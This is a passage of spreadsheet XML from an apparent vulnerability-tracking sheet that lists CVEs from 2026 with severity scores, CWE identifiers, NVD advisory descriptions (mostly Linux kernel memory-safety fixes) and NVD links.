      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in D-Link DIR-895L A1_102b07. This impacts the function sendOffer/sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack can only be done within the local network. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70341</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Edge (Chromium-based) allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70341</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7863</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software allows OS Command Injection.
This issue affects Pardus Software: before 1.0.5.</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7863</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80932</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vsock/virtio: flush works in dependency order
virtio_vsock_remove() stops the virtqueues and then flushes each work
item before freeing the enclosing virtio_vsock.  The current order does
not account for dependencies between those items: tx_work may queue
send_pkt_work, and send_pkt_work may queue rx_work.
In particular, send_pkt_work can set restart_rx and release tx_lock.
The remove path can then stop the queues and flush rx_work before
send_pkt_work queues it.  Although the later send_pkt_work flush waits
for that producer to finish, nothing waits for the newly queued rx_work,
so kfree(vsock) can race with it.
KASAN reported:
  BUG: KASAN: slab-use-after-free in
  virtio_transport_rx_work+0x487/0x4b0
  Read of size 8 at addr ffff888114c2b008 by task kworker/1:1/47
  Workqueue: virtio_vsock virtio_transport_rx_work
  Call Trace:
   virtio_transport_rx_work+0x487/0x4b0
   process_one_work+0x688/0x1120
   worker_thread+0x45b/0xd10
  Allocated by task 1:
   virtio_vsock_probe+0xef/0x6b0
  Freed by task 84:
   kfree+0x131/0x3c0
   virtio_vsock_remove+0xd1/0x100
Flush the works in producer-to-consumer order.  virtio_vsock_vqs_del()
has already disabled the queue callbacks and cleared the run flags, so
after tx_work and send_pkt_work are drained, no source remains that can
queue rx_work after its flush.</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80932</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80953</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: adi: initialize the lock before enabling interrupts
adi_i3c_master_probe() requests the IRQ and unmasks REG_IRQ_PENDING_CMDR
before the controller's IBI state, transfer queue list and transfer
queue lock are initialized.  A pending CMDR interrupt can therefore run
adi_i3c_master_irq() and take master-&gt;xferqueue.lock before the dynamic
lock has been initialized.
This issue was found by our static analysis tool and then manually
reviewed against the current tree.
The grounded PoC kept the probe ordering and the IRQ path
adi_i3c_master_probe() -&gt; adi_i3c_master_irq() -&gt; xferqueue.lock, with a
pending CMDR interrupt arriving after REG_IRQ_PENDING_CMDR is unmasked.
Lockdep reported:
  INFO: trying to register non-static key.
  you didn't initialize this object before use?
  lock_acquire+0xbb/0x290
  _raw_spin_lock_irqsave+0x36/0x60
  adi_i3c_master_irq+0x32/0x56 [vuln_msv]
  adi_i3c_master_probe+0x5a/0xf47 [vuln_msv]
Initialize the transfer queue and IBI state before requesting and
unmasking the IRQ.</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80953</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80967</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: pcxhr: initialize mutexes before requesting threaded IRQ
pcxhr_probe() requests pcxhr_threaded_irq() before initializing
mgr-&gt;lock, even though the threaded handler takes that mutex.
Initialize the manager locks before request_threaded_irq() so an
early interrupt cannot run against uninitialized mutex state during
probe.</t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80967</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81004</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi:msghandler: Cancel work cleanly on an error
If an error occurs during startup of an IPMI interface, it may have
scheduled work to run.  The work needs to be canceled before the
interface can be freed.</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81004</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81012</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: fix off-by-one write in hp_get_string_from_buffer()
hp_get_string_from_buffer() clamps the converted string length against
the destination buffer size with "size &gt; dst_size", so when the
converted length is exactly equal to dst_size, conv_dst_size is left
at dst_size and the unconditional NUL terminator write
	dst[conv_dst_size] = 0;
lands one byte past the destination buffer. This is the same shape of
bug as the previously fixed off-by-one in hp_convert_hexstr_to_str():
the buffer is sized correctly for the content, but the terminator
write is never checked against that size.
Fix by changing the comparison to "&gt;=" so conv_dst_size is always left
with room for the terminator.
All fixed-size destinations that reach this function (path[512],
current_value[512], current_password/current_value[64], and the
per-entry buffers in encodings[][512] and prerequisites[][512]) are
affected.</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81012</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81017</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: sensorhub: Bound the EC-reported sensor number
Each EC FIFO event carries an 8-bit sensor number (in-&gt;sensor_num).
cros_ec_sensorhub_ring_handler() validates the FIFO event count, the
per-read count and the ring bound, but not the sensor number, which
cros_ec_sensor_ring_process_event() then uses unchecked to index
sensorhub-&gt;batch_state[] - allocated with only sensorhub-&gt;sensor_num
entries. A sensor number of sensor_num or larger is an out-of-bounds
read and write of batch_state[].
Validate the sensor number in the ring handler, where each event is read
from the EC, and drop a malformed event before it is used.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81017</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89066</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command in the task synthesis component in projen before 0.103.0 might allow context-dependent attackers to execute arbitrary commands on a developer workstation or continuous integration runner via shell metacharacters in project configuration values and repository file names that are interpolated into generated task definitions.
To remediate this issue, users should upgrade to version 0.103.0 and then re-synthesize the project so that .projen/tasks.json is regenerated with the corrected task definitions. Upgrading alone is not sufficient because the generated task definition file is committed to the repository.</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89066</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89452</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/msm: Unwind probe state on registration failure
msm_iommu_probe() adds its devm-managed IOMMU object to
qcom_iommu_devices before adding the IOMMU sysfs device and registering
it with the IOMMU core.
If iommu_device_sysfs_add() fails, probe returns with the object still on
qcom_iommu_devices. The driver core then releases the devm allocation,
leaving a dangling list entry that later list walks may dereference.
If iommu_device_register() fails, the same dangling list entry remains
and the sysfs device is left registered as well.
Unwind the sysfs device and global list entry in reverse setup order on
the corresponding failure paths.</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89452</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89465</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: rt9455: quiesce delayed work before teardown
The threaded IRQ handler can queue pwr_rdy_work,
max_charging_time_work and batt_presence_work.  pwr_rdy_work and
batt_presence_work can also queue max_charging_time_work, while
batt_presence_work can requeue itself.
rt9455_remove() cancels max_charging_time_work before
batt_presence_work.  The latter can therefore queue
max_charging_time_work after it has already been cancelled:
  rt9455_remove()                   workqueue
    cancel pwr_rdy_work
    cancel max_charging_time_work
                                      batt_presence_work queues
                                        max_charging_time_work
    cancel batt_presence_work
    return
    devres frees rt9455_info
                                      max_charging_time_work dereferences
                                        rt9455_info
The IRQ also remains registered until devres cleanup and can queue more
work after any of the cancellation calls.  If rt9455_hw_init() fails
after the IRQ has been requested, probe returns without cancelling work
that may already have been queued.  A pending callback can then access
rt9455_info after it has been freed.
Register rt9455_cancel_all_delayed_works() through
devm_add_action_or_reset() right after devm_power_supply_register().
devres invokes the action in reverse registration order, after the
managed IRQ has been freed and before rt9455_info is released, so the
delayed works are drained in both rt9455_remove() and the probe error
path.  Cancel pwr_rdy_work and batt_presence_work before
max_charging_time_work because both can queue the latter.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89465</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89469</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: lp8727: fix use-after-free in lp8727_release_irq()
lp8727_isr_func(), the threaded IRQ handler, is the only caller that arms
pchg-&gt;work via schedule_delayed_work().  lp8727_release_irq() currently
cancels the work before freeing the IRQ, so an IRQ delivered in between
can re-arm the work through the threaded handler.  After .remove returns
the devm layer frees pchg while lp8727_delayed_func() may still run and
dereference it.
Free the IRQ first so the threaded handler is quiesced and can no longer
queue work, then cancel the delayed work to drain the final generation.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89469</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89470</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: cros_usbpd: Limit port counts to EC_USB_PD_MAX_PORTS
Currently the cros_usbpd-charger driver probe iterates based on raw
charger port count returned by the embedded controller. The only check
is against the number of USB PD ports which the embedded controller
also defines. A malicious embedded controller could return an inaccurate
port count (up to 255) resulting in an out of bounds write and
subsequent memory corruption.
Update helper functions in cros_usbpd-charger to limit port counts to
EC_USB_PD_MAX_PORTS.</t>
        </is>
      </c>
      <c r="S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89470</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89471</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: cros_usbpd-charger: bound the EC-reported port count
cros_usbpd_charger_probe() reads two port counts from the EC and uses
one of them, num_charger_ports, as the loop bound when populating a
fixed-size array:
	struct port_data *ports[EC_USB_PD_MAX_PORTS];	/* 8 entries */
	...
	for (i = 0; i &lt; charger-&gt;num_charger_ports; i++)
		charger-&gt;ports[charger-&gt;num_registered_psy++] = port;
Both num_usbpd_ports (from EC_CMD_USB_PD_PORTS) and num_charger_ports
(from EC_CMD_CHARGE_PORT_COUNT) are u8 values reported by the EC. The
only validation is a sanity check that compares the two EC-reported
values against each other:
	if (num_charger_ports &lt; num_usbpd_ports ||
	    num_charger_ports &gt; num_usbpd_ports + 1)
		return -EPROTO;
It never checks either count against EC_USB_PD_MAX_PORTS, the size of
the ports[] array. A malfunctioning, malicious or compromised EC that
